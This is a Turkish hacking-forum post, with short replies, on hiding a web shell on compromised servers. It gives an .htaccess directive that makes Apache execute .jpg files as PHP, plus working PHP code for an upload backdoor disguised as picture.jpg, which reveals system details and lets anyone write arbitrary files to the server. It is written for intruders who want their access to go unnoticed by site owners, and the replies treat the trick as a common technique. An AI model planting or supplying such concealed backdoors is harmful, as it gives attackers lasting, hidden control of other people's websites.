Shell Backdoor gizleme yöntemi

Girdiğiniz sunucu & hostinglere attığınız sheller çok çabuk göze çarpıyor ve bulunuyorlar , bunun sebebi tabiki olası uzantılarının .php olması , yani site sahipleri ne aradıklarını gayet iyi biliyorlar , hiçbiri bir resim dosyasını açıp bakmaz ama php uzantılı tüm dosyaları incelerler.

Bizde madem öyle , shellimizi .jpg uzantılı yükleyip farkedilmez yapacağız. Öncelikle aşağıdaki .htaccess dosyasını backkdorlu jpg resim dosyamızın olduğu dizine yüklüyoruz.

AddType application/x-httpd-php .jpg

Sonrasında ise picture.jpg adlı dosyamızı oluşturup bir txt editor ile açıp aşağıdaki kodları imaj dosyamıza kayıt edip kapatıyoruz ve htaccessi yüklediğimiz dizine bunuda yüklüyoruz.

<?php
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
   if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
   else { echo '<b>Basarisiz</b><br><br>'; }
}
?>

Evet artık backdoorumuz yani picture.jpg adlı dosyamız bir php gibi davranacak ve bundan kimsenin haberi olmayacak , siz siteyi www.spyhackerz.com/images/picutre.jpg şeklinde açtığınızda backdoorunuz ile karşılacaksınız.

not: picture.jpg nin içine istediğiniz türden php kodu ekleyebilirsiniz , istediğiniz shellin kodlarını yerleştirebilirsiniz , gerisi size kalmış birşey.

 

update

 

http://www.spyhackerz.com/images/picutre.jpg bi heves tıkladım shell felan vardır gömerim indexi die :d

 

Abi herkes bu backdooru kullanıyor yazan ne yazmış yav

 

Hala en çok kullanilan tekniklerden +

 

wala ben tag ekliodum nasi geldim bura neyse +